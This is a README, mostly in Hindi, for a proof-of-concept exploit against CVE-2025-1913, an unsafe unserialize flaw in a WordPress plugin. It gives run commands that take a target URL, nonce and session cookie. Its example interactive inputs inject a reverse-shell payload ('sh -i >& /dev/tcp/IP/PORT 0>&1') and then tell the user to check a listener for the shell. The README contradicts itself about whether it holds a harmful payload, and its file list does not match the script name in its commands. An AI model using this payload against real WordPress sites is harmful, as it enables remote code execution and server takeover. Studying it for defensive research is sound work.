
A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.
यह रिपॉजिटरी CVE-2025-1913 के लिए केवल शैक्षिक प्रूफ ऑफ कॉन्सेप्ट (PoC) रखता है, जिसे Suhaib518 🇸🇦 द्वारा बनाया गया है। यह PoC दर्शाता है कि विशेष रूप से तैयार किया गया सीरियलाइज़ PHP इनपुट प्रभावित WordPress घटकों में कमजोर तर्क को कैसे ट्रिगर कर सकता है। PoC सुरक्षित है और इसमें हानिकारक payloads शामिल नहीं हैं।
⚠️ अस्वीकरण: यह PoC केवल सीखने, अनुसंधान और रक्षात्मक सुरक्षा परीक्षण के लिए है। इसे उन सर्वरों पर उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।
यह कमज़ोरी कुछ WordPress प्लगइन वर्कफ़्लो में PHP सीरियलाइज़ डेटा के असुरक्षित संचालन के कारण मौजूद है। यह PoC दर्शाता है कि हमलावर कैसे तैयार किए गए सीरियलाइज़्ड संरचनाओं की आपूर्ति कर सकता है जो अनपेक्षित आंतरिक व्यवहार का कारण बनती हैं।
इस रिपॉजिटरी में एक Python स्क्रिप्ट शामिल है जो:
.
├── CVE-2025-1913-PoC.py # Suhaib518 KSA द्वारा बनाई गई PoC स्क्रिप्ट
└── README.md # दस्तावेज़ीकरण
स्क्रिप्ट केवल अंतर्निहित Python मॉड्यूल का उपयोग करती है, सिवाय requests के:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
आपसे पूछा जाएगा:
स्क्रिप्ट फिर उन्हें सीरियलाइज़ करेगी, एक WordPress अनुरोध बनाएगी, और भेज देगी।
नीचे एक उदाहरण कमांड है जो उदाहरण मानों (ये दुर्भावनापूर्ण नहीं हैं, केवल प्रक्रिया दिखा रहे हैं) के साथ उपयोग को प्रदर्शित करता है:
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
इंटरैक्टिव प्रश्नों के उदाहरण उत्तर:
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
स्क्रिप्ट तब प्रिंट करेगी:
[*] Sending request…
....शेल के लिए लिसनर की जाँच करें।
unserialize() का उपयोग करने से बचेंMIT लाइसेंस।
Suhaib518 🇸🇦 द्वारा बनाया गया।